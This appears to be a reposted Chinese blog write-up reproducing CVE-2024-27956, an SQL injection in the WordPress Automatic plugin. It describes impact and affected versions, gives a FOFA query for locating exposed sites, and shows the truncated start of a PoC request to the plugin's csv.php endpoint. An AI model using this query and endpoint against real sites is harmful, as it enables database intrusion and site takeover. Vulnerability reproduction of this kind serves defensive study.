热门标签
热门文章
- 1人工智能在模拟空战中击落人类飞行员
- 2猿创征文|我的Python成长之路_python作文
- 3GPT-4完全破解版:用最新官方API微调,想干啥就干啥,网友怕了_gpi4
- 4基于单片机的危险气体远程检测报警系统设计
- 5CentOS7安装MySQL5.7过程以及常用需要修改操作,安装mysqlclient,安装mysql-devel报错问题以及卸载MySQL_docker centos7 mysql client dev
- 6学习笔记之——3DGS-SLAM系列代码解读_gs slam
- 7C#基础学习笔记_c#笔记
- 8期末考试查分,基于青果高校教务系统的一个自动python脚本代码。_大学期末查排名代码
- 9Tomcat 浅度解析_tomcat分析
- 10【Latex】添加删除线,高亮文本_latex 删除线
当前位置: article > 正文
WordPress Automatic插件 SQL注入漏洞复现(CVE-2024-27956)
作者:凡人多烦事01 | 2024-05-15 13:31:00
赞
踩
WordPress Automatic插件 SQL注入漏洞复现(CVE-2024-27956)
0x01 产品简介
WordPress Automatic(又称为WP Automatic)是一款流行的WordPress插件,旨在帮助网站管理员自动化内容创建和发布。该插件可以从各种来源(如RSS Feeds、社交媒体、视频网站、新闻网站等)获取内容,并将其自动发布到WordPress网站。
0x02 漏洞概述
WordPress Automatic 插件3.92.1之前版本中存在SQL注入漏洞,该漏洞源于插件的用户身份验证机制,威胁者可以绕过该机制执行恶意SQL查询,将任意SQL代码注入网站的数据库并实现权限提升。成功利用该漏洞可能获得对网站的未授权访问、创建管理员帐户、上传恶意文件,并可能完全控制受影响的网站。
0x03 影响范围
WordPress Automatic Plugin < 3.92.1
0x04 复现环境
FOFA:body="/wp-content/plugins/wp-automatic"
0x05 漏洞复现
PoC
- POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1
- Host: your-ip
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
- Accept: */*
- Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/凡人多烦事01/article/detail/573066
推荐阅读
相关标签
